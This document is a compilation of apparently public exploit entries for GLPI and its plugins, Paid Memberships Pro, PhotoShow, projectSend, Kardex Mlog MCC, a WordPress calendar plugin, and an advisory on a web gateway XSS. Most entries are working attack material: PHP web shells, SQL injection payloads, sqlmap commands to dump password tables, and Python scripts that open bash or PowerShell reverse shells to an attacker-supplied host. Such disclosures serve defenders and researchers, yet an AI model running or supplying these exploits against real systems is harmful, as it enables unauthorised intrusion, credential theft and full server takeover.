# Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin # Date of found: 11 Jun 2022 # Application: GLPI Activity < 3.1.0 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/activity # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE : CVE-2022-34125 # PoC GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close

# ADVISORY INFORMATION # Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration) # Date of found: 11 Jun 2022 # Application: GLPI >=10.0.0, < 10.0.3 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/glpi-project/glpi # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-31056 # PoC POST /front/change.form.php HTTP/1.1 Host: acme.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156 Content-Length: 4836 Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQ n53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="id" 0 -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="_glpi_csrf_token" 752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35 -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="_actors" {"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]} -----------------------------190705055020145329172298897156-- If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows. POST /ajax/fileupload.php HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841 Content-Length: 559 Origin: http://acme.com Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="name" _uploader_filename -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="showfilesize" 1 -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php" Content-Type: application/x-php Output: <?php echo system($_GET['cmd']); ?> -----------------------------102822935214007887302871396841-- # POC URL http://192.168.56.113/files/_tmp/poc.php?cmd=

# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE) # Date of found: 11 Jun 2022 # Application: GLPI Cartography < 6.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/positions # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-34128 # PoC POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 39 Origin: http://192.168.56.113 Connection: close <?php echo system($_GET["cmd"]); ?>

#!/usr/bin/env python # Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection # Exploit Author: r3nt0n # CVE: CVE-2023-23488 # Date: 2023/01/24 # Vulnerability discovered by Joshua Martinelle # Vendor Homepage: https://www.paidmembershipspro.com # Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip # Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9 # Version: < 2.9.8 # Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7 # # Running this script against a WordPress instance with Paid Membership Pro plugin # tells you if the target is vulnerable. # As the SQL injection technique required to exploit it is Time-based blind, instead of # trying to directly exploit the vuln, it will generate the appropriate sqlmap command # to dump the whole database (probably very time-consuming) or specific chose data like # usernames and passwords. # # Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress import sys import requests def get_request(target_url, delay="1"): payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -" data = {'rest_route': '/pmpro/v1/order', 'code': payload} return requests.get(target_url, params=data).elapsed.total_seconds() print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n') if len(sys.argv) != 2: print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py")) print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py")) sys.exit(1) target_url = sys.argv[1] try: print('[-] Testing if the target is vulnerable...') req = requests.get(target_url, timeout=15) except: print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m')) sys.exit(2) if get_request(target_url, "1") >= get_request(target_url, "2"): print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m')) sys.exit(3) print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m')) print('\n[+] You can dump the whole WordPress database with:') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url)) print('\n[+] To dump data from specific tables:') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url)) print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url)) sys.exit(0)

# Exploit Title: PhotoShow 3.0 - Remote Code Execution # Date: January 11, 2023 # Exploit Author: LSCP Responsible Disclosure Lab # Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/ # Vendor Homepage: https://github.com/thibaud-rohmer # Software Link: https://github.com/thibaud-rohmer/PhotoShow # Version: 3.0 # Tested on: Ubuntu 20.04 LTS # creds of a user with admin privileges required import sys import requests import base64 import urllib.parse if(len(sys.argv)!=6): print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + '"password" "target_ip" "attacker_ip" "attacker_nc_port"') quit() login=sys.argv[1] password=sys.argv[2] targetIp = sys.argv[3] attackerIp = sys.argv[4] attackerNcPort = sys.argv[5] def main(): session = requests.Session() #login as admin user logInSession(session, targetIp, login, password) #change application behaviour for handling .mp4 video uploadExpoit(session, targetIp, attackerIp, attackerNcPort) #send the shell to attaker's nc by uploading .mp4 video sendMP4Video(session, targetIp) print("Check your netcat") def logInSession(session, targetIp, login, password): session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"}) data = "login="+login+"&password="+password url = "http://"+targetIp+"/?t=Login" response= session.post(url, data=data) phpsessid=response.headers.get("Set-Cookie").split(";")[0] session.headers.update({'Cookie' : phpsessid}) def uploadExpoit(session, targetIp, attackerIp, attackerNcPort): exiftranPathInjection=createInjection(attackerIp, attackerNcPort) url = "http://"+targetIp+"/?t=Adm&a=Set" data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \ + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\ + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\ + exiftranPathInjection session.post(url, data=data).content.decode('utf8') def createInjection(attakerIp, attackerNcPort): textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1" b64Encoded = base64.b64encode(textToEncode.encode("ascii")) strb64 = str(b64Encoded) strb64 = strb64[2:len(strb64)-1] injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"} return urllib.parse.urlencode(injection) def sendMP4Video(session, targetIp): session.headers.update({'Content-Type' : "multipart/form-data; "\ +"boundary=---------------------------752343701418612422363028651"}) url = "http://"+targetIp+"/?a=Upl" data = """-----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="path"\r \r \r -----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="inherit"\r \r 1\r -----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r Content-Type: video/mp4\r \r a\r -----------------------------752343701418612422363028651--\r """ try: session.post(url, data=data, timeout=0.001) except requests.exceptions.ReadTimeout: pass if __name__ =="__main__": main()

Exploit Title: projectSend r1605 - Remote Code Exectution RCE Application: projectSend Version: r1605 Bugs: rce via file extension manipulation Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 26-01-2023 Author: Mirabbas Ağalarov Tested on: Linux POC video: https://youtu.be/Ln7KluDfnk4 2. Technical Details & POC ======================================== 1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 2.Then the attacker starts listening for ip and port nc -lvp 4444 3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg POST /includes/upload.process.php HTTP/1.1 Host: localhost Content-Length: 525 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="name" openme.sh;jpg ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunk" 0 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunks" 1 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 ------WebKitFormBoundary0enbZuQQAtahFVjI-- 4.In the second request, we do this to the filename section at the bottom. openme.sh POST /files-edit.php?ids=34 HTTP/1.1 Host: localhost Content-Length: 1016 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/files-edit.php?ids=34&type=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="csrf_token" 66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][id]" 34 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][original]" openme.sh;.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][file]" 1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][name]" openme.sh ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][description]" ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][expiry_date]" 25-02-2023 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="save" ------WebKitFormBoundaryc8btjvyb3An7HcmA-- And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce private youtube video poc : https://youtu.be/Ln7KluDfnk4

Exploit Title: Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) Product: Secure Web Gateway Affected Versions: 10.2.11, potentially other versions Fixed Versions: 10.2.17, 11.2.6, 12.0.1 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002 Advisory Status: published CVE: CVE-2023-0214 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214 Introduction ============ "Skyhigh Security Secure Web Gateway (SWG) is the intelligent, cloud-native web security solution that connects and secures your workforce from malicious websites and cloud apps—from anywhere, any application, and any device." (from the vendor's homepage) More Details ============ The Secure Web Gateway's (SWG) block page, which is displayed when a request or response is blocked by a rule, can contain static files such as images, stylesheets or JavaScript code. These files are embedded using special URL paths. Consider the following excerpt of a block page: ------------------------------------------------------------------------ <html> <!-- FileName: index.html Language: [en] --> <!--Head--> <head> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <title>McAfee Web Gateway - Notification</title> <script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script> <link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" /> </head> ------------------------------------------------------------------------ Static content is loaded from URL paths prefixed with "/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this prefix are intercepted and directly handled by the SWG no matter on which domain they are accessed. While the prefix can be configured in the SWG, attackers can also obtain it using another currently undisclosed vulnerability. By reverse engineering the file "libSsos.so" and analysing JavaScript code, it was possible to derive the API of the "Ssos" plugin's "SetLoginToken" action. Through the following call using the command-line HTTP client curl, the behaviour of the plugin was further analysed: ------------------------------------------------------------------------ $ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p' HTTP/1.0 200 OK P3P: p Connection: Keep-Alive Set-Cookie: MwgSso=v; Path=/; Max-Age=240; Content-Type: application/javascript Content-Length: 2 X-Frame-Options: deny c; ------------------------------------------------------------------------ The response embeds the values of the three URL parameters "v", "c" and "p". The value for "p" is embedded as value of the "P3P" header, the value of "c" as the response body and the value of "v" as the value of the cookie "MwgSso". It is also possible to include newline or carriage return characters in the parameter value which are not encoded in the output. Consequently, if the value of the parameter "p" contains a line break, arbitrary headers can be injected. If two line breaks follow, an arbitrary body can be injected. If a suitable "Content-Length" header is injected, the remaining headers and body of the original response will be ignored by the browser. This means that apart from the initial "P3P" header, an arbitrary response can be generated. For example, a page containing JavaScript code could be returned, resulting in a cross-site scripting attack. Consequently, attackers can construct URL paths that can be appended to any domain and cause an arbitrary response to be returned if the URL is accessed through the SWG. This could be exploited by distributing such URLs or even by offering a website which performs an automatic redirect to any other website using such a URL. As a result, the SWG exposes its users to self-induced cross-site scripting vulnerabilities in any website. Proof of Concept ================ In the following request, the "p" parameter is used to inject suitable "Content-Type" and "Content-Length" headers, as well as an arbitrary HTML response body. ------------------------------------------------------------------------ $ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>' HTTP/1.0 200 OK P3P: p Content-Type: text/html Content-Length: 27 <h1>RedTeam Pentesting</h1> ------------------------------------------------------------------------ As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL resulting in a cross-site scripting vulnerability. Workaround ========== None. Fix === According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL: https://kcm.trellix.com/corporate/index?page=content&id=SB10393 Security Risk ============= The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in context of any domain. Attackers only need to convince users to open a prepared URL or visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability such as account takeover. As a result, this vulnerability poses a high risk. Timeline ======== 2022-07-29 Vulnerability identified 2022-10-20 Customer approved disclosure to vendor 2022-10-20 Vulnerability was disclosed to the vendor 2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1. 2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

#!/usr/bin/env python3 # Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) # Date: 12/13/2022 # Exploit Author: Patrick Hener # Vendor Homepage: https://www.kardex.com/en/mlog-control-center # Version: 5.7.12+0-a203c2a213-master # Tested on: Windows Server 2016 # CVE : CVE-2023-22855 # Writeup: https://hesec.de/posts/CVE-2023-22855 # # You will need to run a netcat listener beforehand: ncat -lnvp <port> # import requests, argparse, base64, os, threading from impacket import smbserver def probe(target): headers = { "Accept-Encoding": "deflate" } res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers) if "fonts" in res.text: return True else: return False def gen_payload(lhost, lport): rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE')) payload = f"""<#@ template language="C#" #> <#@ Import Namespace="System" #> <#@ Import Namespace="System.Diagnostics" #> <# var proc1 = new ProcessStartInfo(); string anyCommand; anyCommand = "powershell -e {rev_shell_blob_b64.decode()}"; proc1.UseShellExecute = true; proc1.WorkingDirectory = @"C:\Windows\System32"; proc1.FileName = @"C:\Windows\System32\cmd.exe"; proc1.Verb = "runas"; proc1.Arguments = "/c "+anyCommand; Process.Start(proc1); #>""" return payload def start_smb_server(lhost): server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) server.addShare("SHARE", os.getcwd(), '') server.setSMB2Support(True) server.setSMBChallenge('') server.start() def trigger_vulnerability(target, lhost): headers = { "Accept-Encoding": "deflate" } requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers) def main(): # Well, args parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', help='Target host url', required=True) parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True) parser.add_argument('-p', '--lport', help='Attacker listening port', required=True) args = parser.parse_args() # Probe if target is vulnerable print("[*] Probing target") if probe(args.target): print("[+] Target is alive and File Inclusion working") else: print("[-] Target is not alive or File Inclusion not working") exit(-1) # Write payload to file print("[*] Writing 'exploit.t4' payload to be included later on") with open("exploit.t4", 'w') as template: template.write(gen_payload(args.lhost, args.lport)) template.close() # Start smb server in background print("[*] Starting SMB Server in the background") smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,)) smb_server_thread.start() # Rev Shell reminder print("[!] At this point you should have spawned a rev shell listener") print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'") print("[?] Are you ready to trigger the vuln? Then press enter!") input() # Wait for input then continue # Trigger vulnerability print("[*] Now triggering the vulnerability") trigger_vulnerability(args.target, args.lhost) # Exit print("[+] Enjoy your shell. Bye!") os._exit(1) if __name__ == "__main__": main()

# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) # Date: 2022-05-25 # Exploit Author: Mostafa Farzaneh # WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c # Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ # Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip # Version: 1.4.06 # Tested on: Linux # CVE : CVE-2022-2846 # Description: The Calendar Event Multi View WordPress plugin before 1.4.07 does not have any authorisation and CSRF checks in place when creating an event, and is also lacking sanitisation as well as escaping in some of the event fields. This could allow unauthenticated attackers to create arbitrary events and put Cross-Site Scripting payloads in it. #POC and exploit code: As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the code below <html> <body> <form action=" https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST"> <input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' /> <input type="hidden" name="colorvalue" value="#f00" /> <input type="hidden" name="rrule" value="" /> <input type="hidden" name="rruleType" value="" /> <input type="hidden" name="stpartdate" value="10/6/2022" /> <input type="hidden" name="stparttime" value="00:00" /> <input type="hidden" name="etpartdate" value="10/6/2022" /> <input type="hidden" name="etparttime" value="00:00" /> <input type="hidden" name="stpartdatelast" value="10/6/2022" /> <input type="hidden" name="etpartdatelast" value="10/6/2022" /> <input type="hidden" name="stparttimelast" value="" /> <input type="hidden" name="etparttimelast" value="" /> <input type="hidden" name="IsAllDayEvent" value="1" /> <input type="hidden" name="Location" value="CSRF" /> <input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' /> <input type="hidden" name="timezone" value="4.5" /> <input type="submit" value="Submit request" /> </form> </body> </html> The XSS will be triggered when viewing the related event